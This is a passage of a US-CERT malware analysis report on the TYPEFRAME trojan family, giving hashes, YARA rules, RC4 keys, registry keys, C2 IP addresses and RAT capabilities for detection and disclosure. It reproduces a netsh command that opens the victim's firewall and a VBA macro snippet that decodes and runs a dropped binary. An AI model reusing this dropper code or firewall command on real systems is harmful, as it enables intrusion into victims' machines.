dfb41457088fa2003a085c325bcb63666e1e66fa36bdc8975995bfbeac39500d\r\nPE Metadata\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 12 of 40\n\nCompile Date 2016-07-25 03:12:34-04:00\r\nImport Hash 100f0ee6d217c6b9e15be71a6c42a2d3\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n93649845b04705777d78e05982b93e5f header 4096 0.765196\r\n93649845b04705777d78e05982b93e5f header 4096 0.765196\r\naca858c8ea569b991797da02f8613716 .text 458752 6.614177\r\naca858c8ea569b991797da02f8613716 .text 458752 6.614177\r\n11b9d8a29ef67ebb2c19f753f1c7ada4 .rdata 147456 5.918054\r\n11b9d8a29ef67ebb2c19f753f1c7ada4 .rdata 147456 5.918054\r\n72b7a8f5d846964649b682d6ef074cc0 .data 77824 4.964840\r\n72b7a8f5d846964649b682d6ef074cc0 .data 77824 4.964840\r\nd73a8feca0f13f34575c84df77fbed0e .rsrc 32768 7.100191\r\nd73a8feca0f13f34575c84df77fbed0e .rsrc 32768 7.100191\r\n61c29b19fe37db83e42ef9ddf46eb40f .reloc 40960 5.689934\r\n61c29b19fe37db83e42ef9ddf46eb40f .reloc 40960 5.689934\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nDescription\r\nmidimapper.rs (original name: MDll.dll) is a proxy module installed as a service. This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin Rc4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End Rc4 key--\r\nWhen executed, the malware loads and decrypts the encrypted configuration file data from the registry using the same RC4\r\nkey.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains hexadecimal encoded port numbers:\r\n-- Begin port # list --\r\nFB 20 ==\u003e 20FB ==\u003e 8443\r\n-- End port # list --\r\nThe malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections.\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 13 of 40\n\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=8443 action=allow\r\nenable=yes\"\r\n--End firewall modification--\r\nThe malware attempts to open port 8443 and wait for connection. The malware contains public SSL certificates in its\r\nresource named \"101”. It is designed to generate crafted TLS sessions (fake TLS communication mechanism).\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nTags\r\ndropperproxytrojan\r\nDetails\r\nName BF474B8ACD55380B1169BB949D60E9E4\r\nSize 466241 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 bf474b8acd55380b1169bb949d60e9e4\r\nSHA1 c60c18fc0226a53be15637ee3ef0b73b0dabd854\r\nSHA256 d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nSHA512 46995cf3516c160d2f4fa5957c8c67df75f2768b24562b22de46a5d4ef7ba17fecaef2ad900bc6925e0c4284802864361423653154ad0622af\r\nssdeep 12288:G+3/oi/EpRsV97/8Olq3p8YNk5oYEeLxCStEowZVKmZag:Gmoi/EpRsV9S3prgomLE9oVmQg\r\nEntropy 7.760001\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.TSGeneric\r\nAvira TR/Autophyte.hctaa\r\nBitDefender Trojan.GenericKD.31017522\r\nClamAV Win.Trojan.Typeframe-6595034-1\r\nCyren W32/Trojan.SYHZ-1002\r\nESET a variant of Win32/NukeSped.EO trojan\r\nEmsisoft Trojan.GenericKD.31017522 (B)\r\nIkarus Trojan.Win32.Autophyte\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee RDN/Generic Dropper\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV Trojan.Win32.Autophyte.feqzxh\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro BKDR_PROXSPED.A\r\nTrendMicro House Call BKDR_PROXSPED.A\r\nVirusBlokAda BScope.TrojanDropper.Agent\r\nZillya! Dropper.Agent.Win32.376404\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 14 of 40\n\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\" strings: $s0 =\r\n{ 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = {\r\nae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and\r\nuint16(uint32(0x3c)) == 0x4550) and any of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-08 07:12:45-04:00\r\nImport Hash 225e9f7be86d6676c98a852492458049\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n21257d58787390491b672d426714b015 header 4096 0.592724\r\ndff4417e6006f193afa34a31581d52dd .text 53248 6.423430\r\n5fbeefe580cf5cb5ee032f29c78b5f7b .rdata 12288 3.435650\r\nc5776014ec07771c8d8093a7af1868c7 .data 16384 2.126011\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\nd1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nDescription\r\nThis 32-bit Windows executable is a RAT, designed to install a proxy module as a service on the victim’s system.\r\nThe malware's APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin Rc4 key--\r\n75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05\r\n--End Rc4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\n\"wmplayer.xml\"\r\n\"printcache.tlb\"\r\n\"printcache\"\r\n\"Print Device Cache\"\r\n\"Manage Print Device Cache And Printing\"\r\n--End strings of interest--\r\nWhen executed, the malware will load an embedded RC4 encrypted archive file from the start of the offset \"0x15000”.\r\nThe malware decrypts the archive using the same Rc4 key. The decrypted archive contains a proxy module, which is\r\ndecompressed and installed from the existing file name \"wmplayer.xml\" to \"C:\\Windows\\system32\\printcache.tlb\".\r\nThe malware installs the module as a serviceDLL in the \"printcache\" service group in order to execute\r\n\"C:\\Windows\\system32\\printcache.tlb\" by the Windows service hosting process,\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 15 of 40\n\n\"%SYSTEMROOT%\\system32\\svchost.exe”.\r\n--Begin service--\r\nServiceName = \"printcache\"\r\nDisplayName = \"Print Device Cache\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k printcache\"\r\n--End service--\r\nThe malware contains an RC4 encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it\r\ninstalls the encrypted configuration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Signature\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\n40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nTags\r\nproxytrojan\r\nDetails\r\nName 1printcache.tlb\r\nName CA67F84D5A4AC1459934128442C53B03\r\nSize 778240 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 ca67f84d5a4ac1459934128442c53b03\r\nSHA1 f4eb6a50c60320edafb3e48c612c6a55560d0684\r\nSHA256 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nSHA512 4695cf69e2ae52fc94eab31cbc3bb846022a3e1516d9bc293118f674ea1eb86468cff0a4c0dee8dff8a2d545df153116e8d86669513426e1b3\r\nssdeep 12288:drrF4D0d2QKPIyWE8QPnWnGHiS2VcL2ZotSNfpV532/dlZ:x6IGnWntQ2ZvfpvmdlZ\r\nEntropy 6.710797\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV Win.Trojan.Typeframe-6595034-1\r\nCyren W32/Trojan.NVOE-8746\r\nESET a variant of Win32/NukeSped.EO trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee GenericRXFZ-TW!CA67F84D5A4A\r\nNANOAV Trojan.Win32.NukeSped.feqzxq\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 16 of 40\n\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Agentb\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-08 07:12:35-04:00\r\nImport Hash 09e63e3d425d6b543de4003f71c2b66d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n5b1f93f0412e9f1c7a7ad42d729b292b header 4096 0.769911\r\ne6ea312f762f4df521b229a77f186664 .text 475136 6.629464\r\nb6fa7b267ea19010d44f056ec3cca39d .rdata 147456 5.920344\r\n1076ec3948d21da8d6c5036548880c63 .data 77824 4.972282\r\n77c814f5856057e7a7f6237bbba51a76 .rsrc 32768 7.100017\r\n3184d0afb653bf0723cadccc14d92071 .reloc 40960 5.752155\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\n40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nDescription\r\n1printcache.tlb (original name: PDll.dll) is a proxy module installed as a service by the file\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92. This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin Rc4 key--\r\n75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05\r\n--End Rc4 key--\r\nWhen executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 17 of 40\n\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains hexadecimal encoded port numbers:\r\n--Begin port # list --\r\nBB 01 ==\u003e 1BB ==\u003e443\r\n7F 00 ==\u003e 7F ==\u003e 127\r\nFB 20 ==\u003e 20FB ==\u003e 8443\r\n--End port # list --\r\nThe malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections.\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=443 action=allow enable=yes\"\r\n--End firewall modification--\r\nThe malware attempts to open ports 443, 127, and 8443 and wait for connection. The malware contains public SSL\r\ncertificates in its resource name \"101”. It is designed to generate crafted TLS sessions (fake TLS communication\r\nmechanism).\r\n546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\nTags\r\ndownloaderdroppertrojan\r\nDetails\r\nName 6AB301FC3296E1CEB140BF5D294894C5\r\nSize 259584 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 6ab301fc3296e1ceb140bf5d294894c5\r\nSHA1 8d62498656db928f987b47bdbcfab5d6032be48a\r\nSHA256 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\nSHA512 3abd7a690d821ace78d8f5e2394f0922308963c7ba8ee63661e9cdb2e36fe8353904346b4b0457c6ace3071505533187d62a41d47473a6a9\r\nssdeep 3072:JdHh7xVwMPRTxXX0bqkmvA7XKmJLiSi3Ix1DKXrlTNEsuFFCeojbmUkGVcNP+:17xVrxxn0PrWiv8hLnS+\r\nEntropy 5.918488\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.Cossta\r\nAvira TR/AD.APTLazerus.aroap\r\nBitDefender Trojan.GenericKD.31019942\r\nClamAV Win.Trojan.Typeframe-6595058-1\r\nCyren W64/Trojan.BVRT-3061\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Trojan.GenericKD.31019942 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 0051c2fd1 )\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 18 of 40\n\nMcAfee RDN/Generic.dx\r\nMicrosoft Security Essentials Trojan:Win32/Typeframe\r\nNANOAV Trojan.Win64.Cossta.feqzmr\r\nSymantec Trojan Horse\r\nTrendMicro TROJ64_.CF537F06\r\nTrendMicro House Call TROJ64_.CF537F06\r\nVirusBlokAda Trojan.Downloader\r\nZillya! Trojan.GenericKD.Win32.146686\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-05-08 11:43:26-04:00\r\nImport Hash b32c7db2b70ae7b183886924d873c585\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n24baa03194bc78f0184ea606128bc80f header 1024 2.821047\r\n170ce86f9a7ffcd242f3903fafe1f302 .text 57856 6.433615\r\n33b066692952c4534ebf0a56ca293085 .rdata 37888 5.095210\r\nb4eed5366c4254a3c7f6c2f021c29efe .data 156160 4.916035\r\n3ad7431aaa87a1e6b6400ca9b273d98a .pdata 4096 4.579212\r\nc23d2715b42b072fcf86b2aa58807b56 .rsrc 512 4.714485\r\nad711ec082866631d620286bb36fdb72 .reloc 2048 4.752156\r\nRelationships\r\n546dbd370a... Contains 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nDescription\r\nThis file is a malicious 64-bit Windows dynamic-link library (DLL) that is designed to drop and execute an embedded file.\r\nThe malware decodes the embedded file by XORing it with the value \"0x35\".\r\nDuring analysis, the malware executed the file as C:\\Windows\\Temp\\java.exe\r\n(3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210). The dropped file has been identified as a\r\nRAT.\r\n3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 19 of 40\n\nName java.exe\r\nSize 118784 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 77b50bb476a85a7aa30c962a389838aa\r\nSHA1 df466a1f473c7c5eba5f22d90822fd1430b6a244\r\nSHA256 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nSHA512 33b78e0bc8832958b79292bfebffe32c03b59b92044bb95331ee384f7061f6724c7d10bcf17ee1395dbd437b225c0813ba4bc5de6ef44f4bdd\r\nssdeep 3072:sPhrkoI8QYJRMs4y5pe+/a5sN5t4+PXP:Mi/lqpe+/0sa\r\nEntropy 5.880053\r\nAntivirus\r\nAhnlab Backdoor/Win32.Agent\r\nAntiy Trojan/Win32.Cossta\r\nAvira TR/Agent.bkecf\r\nBitDefender Trojan.GenericKD.30623185\r\nClamAV Win.Trojan.Typeframe-6595035-1\r\nCyren W32/Trojan.YPCX-1821\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Trojan.GenericKD.30623185 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 004fa2411 )\r\nMcAfee Trojan-FNWY!77B50BB476A8\r\nMicrosoft Security Essentials Trojan:Win32/Typeframe\r\nNANOAV Trojan.Win32.NukeSped.fajisv\r\nQuick Heal Trojan.MauvaiseRI.S5249940\r\nSophos Troj/Cruprox-A\r\nSymantec Backdoor.Cruprox\r\nSystweak trojan.nukesped\r\nTACHYON Backdoor/W32.Agent.118784.FE\r\nTrendMicro TROJ_NUKESPED.A\r\nTrendMicro House Call TROJ_NUKESPED.A\r\nVirusBlokAda Trojan.Cossta\r\nZillya! Trojan.Cossta.Win32.10325\r\nYara Rules\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 20 of 40\n\nhidden_cobra_consolidated.yara\r\nrule HC_RAT { meta: author = \"NCCIC Code \u0026 Media Analysis\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"1C53E7269FE9D84C6DF0A25BA59B822C\" strings:\r\n$s0 = {8B4C240433C081E1FFFF000081C10080FFFF83F9430F8770010000}\r\n$s1 = {880430403D00010000} $s2 =\r\n{48894C2408574883EC200FB7C133FF050080FFFF83F8430F8760020000} $s3\r\n= {8801FFC048FFC13D00010000} condition: ($s0 and $s1) or ($s2 and $s3) }\r\nssdeep Matches\r\n94 7429a6b6e8518a1ec1d1c37a8786359885f2fd4abde560adaef331ca9deaeefd\r\nPE Metadata\r\nCompile Date 2017-04-28 03:28:32-04:00\r\nImport Hash 85c89bf0449505044219f0be26213402\r\nCompany Name Microsoft Corporation\r\nFile Description ProQuota\r\nInternal Name proquota\r\nLegal Copyright Microsoft Corporation. All rights reserved.\r\nOriginal Filename proquota.exe.mui\r\nProduct Name Microsoft Windows Operating System\r\nProduct Version 6.1.7600.16385\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n81c12eb5fc3cbdd06675cd1097363a40 header 4096 0.689960\r\n2539474aa6202371abd37a4d66031955 .text 86016 6.641666\r\nb97c14b801643b3a61ea28266f3f71b1 .rdata 8192 4.735406\r\n48eb8a67d4fd42ea24da9dc9029cb101 .data 16384 1.857068\r\nc139ac9cb34e0620a10c15e5d42b85d2 .rsrc 4096 1.174962\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\n3c809a1010... Connected_To 184.107.209.2\r\n3c809a1010... Connected_To 111.207.78.204\r\n3c809a1010... Connected_To 80.91.118.45\r\n3c809a1010... Connected_To 181.119.19.56\r\nDescription\r\nThis file is a 32-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s\r\nAPIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 21 of 40\n\n--Begin Rc4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End Rc4 key--\r\nThis file is a RAT and contains the following embedded hexadecimal encoded C2 IP addresses and port numbers:\r\n--Begin IP and port # list--\r\n1BBh ==\u003e 443\r\n2D765B50h ==\u003e 80.91.118.45\r\n381377B5h ===\u003e 181.119.19.56\r\n0CC4ECF6Fh ==\u003e 111.207.78.204\r\n2D16BB8h ==\u003e 184.107.209.2\r\n--End IP and port # list--\r\nWhen executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to\r\naccept instructions from the remote server to perform additional functions:\r\n--Begin functions perform by the malware--\r\nSearch for files\r\nExecute process\r\nTerminate processes\r\nDelete files\r\nExecute command-using shell\r\nDownload and upload files\r\nRead files and write files\r\n--End functions perform by the malware--\r\nThe malware is designed to use the same RC4 key to encrypt its configuration file data, which contains the hexadecimal\r\nencoded C2 IP address and port number. The encrypted configuration data is stored into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\n4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd\r\nTags\r\ndownloaderdroppertrojan\r\nDetails\r\nName 3229A6CEA658B1B3CA5CA9AD7B40D8D4\r\nSize 712192 bytes\r\nType\r\nComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: ISkyISea, Template: Norm\r\nBy: ISkyISea, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 17:00, Create Time/Date\r\n18:36:00 2017, Last Saved Time/Date: Thu Apr 6 00:34:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, S\r\nMD5 3229a6cea658b1b3ca5ca9ad7b40d8d4\r\nSHA1 70730e608e2fcc68ce468ed148e965c5bacfb51c\r\nSHA256 4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd\r\nSHA512 ff385a9446415412950562cca832eab1d17de56932f3633a86202dea829e8bd25e56864306f2e6c8bb7ff7d2cfe2785acc4261410e38348946\r\nssdeep 12288:sh+81FiNloAzjMXJ1NPeZ3eMNZtF7fHRRAug0EX7:W1FiNWEYxeV3NfHDe\r\nEntropy 5.446016\r\nAntivirus\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 22 of 40\n\nAhnlab MSOffice/Dropper\r\nAntiy Trojan[Downloader]/MSOffice.Agent.ye\r\nBitDefender VB:Trojan.Valyria.401\r\nClamAV Doc.Dropper.Agent-6591386-0\r\nCyren Trojan.TKGI-6\r\nESET VBA/TrojanDropper.Agent.YE trojan\r\nEmsisoft VB:Trojan.Valyria.401 (B)\r\nIkarus Trojan-Dropper.VBA.Agent\r\nMcAfee W97M/Dropper.dj\r\nMicrosoft Security Essentials TrojanDropper:O97M/SilverMob.A!dha\r\nNANOAV Trojan.Ole2.Vbs-heuristic.druvzi\r\nQuick Heal W97M.Downloader.BJS\r\nSophos Troj/DocDl-KOR\r\nSymantec W97M.Downloader\r\nTACHYON Suspicious/W97M.Obfus.Gen.2\r\nTrendMicro W2KM_SILVMOB.A\r\nTrendMicro House Call W2KM_SILVMOB.A\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis is a malicious Microsoft Word document, and contains Visual Basic for Application (VBA) macros. When the Word\r\ndocument is opened, the user is prompted to enable the use of macros by the Microsoft Word process. If the user enables\r\nmacro execution, the embedded malicious macro will be executed and proceed to decode a PE binary and execute it from\r\n\"%TEMP%\\leo.exe”. A code snippet used to decode the malicious binary is displayed below:\r\n--Begin code snippet--\r\n   On Error GoTo gaqz\r\n      liveOn = \"mfp/fyf\"\r\n      liveOff = Environ(\"temp\") + \"\\\"\r\n   For qnx = 1 To Len(liveOn)\r\n       liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)\r\n   Next\r\n      Dim str(238) As String\r\n   str(1) = \"Encoded hex data\"\r\n   str(2) = \"Encoded hex data\"\r\n   str(3) = \"Encoded hex data\"\r\n   str(4) = \"Encoded hex data\"\r\n   str(5) = \"Encoded hex data\"\r\n   .......\r\n   .......\r\n   str(238) = \"Encoded hex data\"\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 23 of 40\n\nDim offBin(499) As Byte\r\n   str(1) = \"Encoded hex data\"\r\n   str(2) = \"Encoded hex data\"\r\n   str(3) = \"Encoded hex data\"\r\n   ......\r\n   ......\r\n   str(499) = \"Encoded hex data\"\r\n   Open liveOff For Binary Access Write As #1\r\n   lpdq = 1\r\n   For jnx = 0 To 237\r\n       For inx = 0 To 499\r\n           offBin(inx) = Val(\"\u0026H\" + Mid(str(jnx + 1), inx * 2 + 1, 2))\r\n           offBin(inx) = offBin(inx) Xor 231\r\n       Next inx\r\n       Put #1, lpdq, offBin\r\n       lpdq = lpdq + 500\r\n   Next jnx\r\n   Close #1\r\n   jfsukew liveOff\r\n   liveOn = \"tfdvsjuzxbsojoh`mndjsu`514/epd\"\r\n   liveOffd = Environ(\"temp\") + \"\\\"\r\n   For qnx = 1 To Len(liveOn)\r\n       liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)\r\n   Next qnx\r\n   Dim strd(167) As String\r\nstrd(167) = \"\"\r\n   Dim offBind(499) As Byte\r\n   Open liveOffd For Binary Access Write As #2\r\n   lpdq = 1\r\n   For jnx = 0 To 166\r\n       For inx = 0 To 499\r\n           offBind(inx) = Val(\"\u0026H\" + Mid(strd(jnx + 1), inx * 2 + 1, 2))\r\n           offBind(inx) = offBind(inx) Xor 231\r\n       Next inx\r\n       Put #2, lpdq, offBind\r\n       lpdq = lpdq + 500\r\n   Next jnx\r\n      Close #2\r\n      SetAttr liveOffd, 6\r\n      bazs = ThisDocument.Name\r\n      Application.Documents.Open (liveOffd)\r\n   Application.ActiveDocument.ActiveWindow.Caption = bazs\r\n   ThisDocument.Close\r\n   gaqz:\r\nEnd Sub\r\nFunction Jdhcuad(Input_Str$) As String\r\n   Dim Len_Str%, Result$, Temp_Str$, n%\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 24 of 40\n\nLen_Str = Len(Input_Str)\r\n   For n = 1 To Len_Str\r\n       Temp_Str = Mid(Input_Str, n, 1)\r\n       Temp_Str = Chr(46 + (Asc(Temp_Str) - 46 - 20 + (122 - 46)) Mod (122 - 46))\r\n       Result = Result + Temp_Str\r\n   Next\r\n      Jdhcuad = Result\r\nEnd Function\r\nPrivate Sub jfsukew(filename)\r\n   Dim obj As Object\r\n   Set obj = CreateObject(Jdhcuad(\"kgw:18\u003cBg0y44\"))\r\n   obj.Run filename, 1, False\r\n   Set obj = Nothing\r\nEnd Sub\r\n--End code snippet--\r\nc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nName BFB41BC0C3856AA0A81A5256B7B8DA51\r\nSize 578174 bytes\r\nType PE32+ executable (GUI) x86-64, for MS Windows\r\nMD5 bfb41bc0c3856aa0a81a5256b7b8da51\r\nSHA1 cb96e29332fe94d1a70309837f73daf7bec81284\r\nSHA256 c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nSHA512 37223163a329ffa7b77a9190aab1da5fbf38c6d76139591d592d695e5caa81b56f6d3769540e2781c87a29de3d39e5e9c8ee70bd9ed6a0bee\r\nssdeep 12288:jxn1kOPTkEjkHsnCrYHM46QyFgHj+u1XC1GbA/UXAfAGZI3PWM+:jxn1kOLkEQHsYYDdD+u1HbA/Uw47/L+\r\nEntropy 7.848313\r\nAntivirus\r\nAhnlab Trojan/Win32.Akdoor\r\nAvira TR/NukeSped.qkzfp\r\nBitDefender Trojan.GenericKD.31025967\r\nClamAV Win.Trojan.Typeframe-6595036-1\r\nCyren W64/Trojan.ZNJL-0100\r\nESET a variant of Win64/NukeSped.BA trojan\r\nEmsisoft Trojan.GenericKD.31025967 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Riskware ( 0040eff71 )\r\nNANOAV Trojan.Win64.NukeSped.feqzml\r\nSophos Troj/NukeSped-T\r\nSymantec Trojan Horse\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 25 of 40\n\nTACHYON Trojan/W32.Agent.578174\r\nTrendMicro BKDR64_.97ED50E7\r\nTrendMicro House Call BKDR64_.97ED50E7\r\nVirusBlokAda Backdoor.Win64.Agent\r\nZillya! Backdoor.Agent.Win64.360\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\" strings: $s0 =\r\n{ 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = {\r\nae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and\r\nuint16(uint32(0x3c)) == 0x4550) and any of them }\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches 